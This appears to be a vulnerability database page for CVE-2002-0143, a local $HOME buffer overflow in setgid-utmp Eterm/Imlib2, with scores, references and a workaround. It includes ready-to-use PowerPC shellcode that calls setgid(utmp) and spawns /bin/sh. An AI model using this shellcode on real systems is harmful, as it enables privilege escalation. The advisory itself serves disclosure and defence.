CVE-2002-0143
CVSS 4.6
Published: 2002-03-25 00:00:00
Revised: 2008-09-10 20:00:35

[Original] Buffer overflow in Eterm of Enlightenment Imlib2 1.0.4 and earlier allows local users to execute arbitrary code via a long HOME environment variable.


[CNNVD] ETerm HOME Environment Variable Buffer Overflow Vulnerability (CNNVD-200203-088)

Eterm is a free, open-source terminal emulator that runs on Linux and Unix operating systems. It is maintained by Michael Jennings.
Eterm has a buffer overflow in its handling of the HOME environment variable that allows local users to gain sgid utmp privileges.
On most systems Eterm is installed setgid utmp. When the $HOME environment variable is set to a string 4128 bytes long, running Eterm triggers a buffer overflow. A local user can overwrite the return address to redirect execution to their own code and thereby obtain the privileges of the utmp group.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to modification of system files]
Availability impact: PARTIAL [may lead to degraded performance or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:enlightenment:imlib:2.1.0.3
cpe:/a:enlightenment:imlib:2.1.0.2
cpe:/a:michael_jennings:eterm:0.9.1
cpe:/a:enlightenment:imlib:2.1.0.1
cpe:/a:enlightenment:imlib:2.1.0.4
cpe:/a:enlightenment:imlib:2.0.01.0.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0143
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0143
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-088
(Official data source) CNNVD

- Other links and resources

http://www.iss.net/security_center/static/7896.php
(VENDOR_ADVISORY)  XF  eterm-home-bo(7896)
http://online.securityfocus.com/archive/1/251597
(VENDOR_ADVISORY)  BUGTRAQ  20020121 Re: Eterm SGID utmp Buffer Overflow (Local)
http://online.securityfocus.com/archive/1/250145
(VENDOR_ADVISORY)  BUGTRAQ  20020113 Eterm SGID utmp Buffer Overflow (Local)
http://www.securityfocus.com/bid/3868
(UNKNOWN)  BID  3868

- Vulnerability information

ETerm HOME Environment Variable Buffer Overflow Vulnerability
Medium severity  Boundary condition error
2002-03-25 00:00:00 2006-09-05 00:00:00
Local

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Remove the sgid utmp bit from Eterm.
 # chmod g-s Eterm
Vendor patch:
Eterm
-----
The vendor has not yet provided a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.eterm.org

- Vulnerability information (21226)

IMLib2 Home Environment Variable Buffer Overflow Vulnerability (EDBID:21226)
linux local
2002-01-13 Verified
0 Charles Stevenson
N/A
source: http://www.securityfocus.com/bid/3868/info

Imlib2 is a freely available, open source graphics library available for the Linux and Unix operating systems. It is maintained by Michael Jennings.

Imlib2 is installed on many operating systems and linked with graphical programs such as Eterm. Some programs linked with the library are setuid, such as Eterm, which is a setuid utmp program. In some cases a buffer overflow via the $HOME environment variable may occur, such as when the $HOME environment variable is filled with 4128 bytes and Eterm is executed. This can allow a local user to overwrite stack variables up through the return address and execute arbitrary code. As the Eterm program is setgid utmp, this code would be executed with utmp privileges.

/* execve.c
 *
 * PowerPC Linux Shellcode
 *
 * by Charles Stevenson <core@bokeoa.com>
 *
 * original execve by my good friend
 * Kevin Finisterre  <dotslash@snosoft.com>
 */

#include <stdio.h>

char shellcode[] =
/* setgid(43) utmp */
        "\x38\x60\x01\x37"              /* 100004a0: li      r3,311             */
        "\x38\x63\xfe\xf4"              /* 100004a4: addi    r3,r3,-268         */
        "\x3b\xc0\x01\x70"              /* 100004a8: li      r30,368            */
        "\x7f\xc0\x1e\x70"              /* 100004ac: srawi   r0,r30,3           */
        "\x44\xff\xff\x02"              /* 100004b0: sc                         */
/* execve("/bin/sh") */
        "\x7c\xa5\x2a\x78"              /* 100004b0: xor     r5,r5,r5           */
        "\x40\x82\xff\xed"              /* 100004b4: bnel+   100004a0 <main>    */
        "\x7f\xe8\x02\xa6"              /* 100004b8: mflr    r31                */
        "\x3b\xff\x01\x30"              /* 100004bc: addi    r31,r31,304        */
        "\x38\x7f\xfe\xf4"              /* 100004c0: addi    r3,r31,-268        */
        "\x90\x61\xff\xf8"              /* 100004c4: stw     r3,-8(r1)          */
        "\x90\xa1\xff\xfc"              /* 100004c8: stw     r5,-4(r1)          */
        "\x38\x81\xff\xf8"              /* 100004cc: addi    r4,r1,-8           */
        "\x3b\xc0\x01\x60"              /* 100004d0: li      r30,352            */
        "\x7f\xc0\x2e\x70"              /* 100004d4: srawi   r0,r30,5           */
        "\x44\xff\xff\x02"              /* 100004d8: sc                         */
        "\x2f\x62\x69\x6e"              /* 100004dc: cmpdi   cr6,r2,26990   ("/bin")  */
        "\x2f\x73\x68\x00";             /* 100004e0: cmpdi   cr6,r19,26624  ("/sh\0") */

int main(int argc, char **argv) {
   /* report the payload length (including the terminating NUL) on stderr */
   fprintf(stderr, "sizeof(shellcode)=%zu\n", sizeof(shellcode));
   //__asm__("b shellcode");
   /* write the raw bytes to stdout */
   printf("%s", shellcode);
   return 0;
}

- Vulnerability information

2023
Eterm Home Environment Variable Character String Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- Vulnerability description

- Timeline

2002-01-13 Unknown
2002-01-13 Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete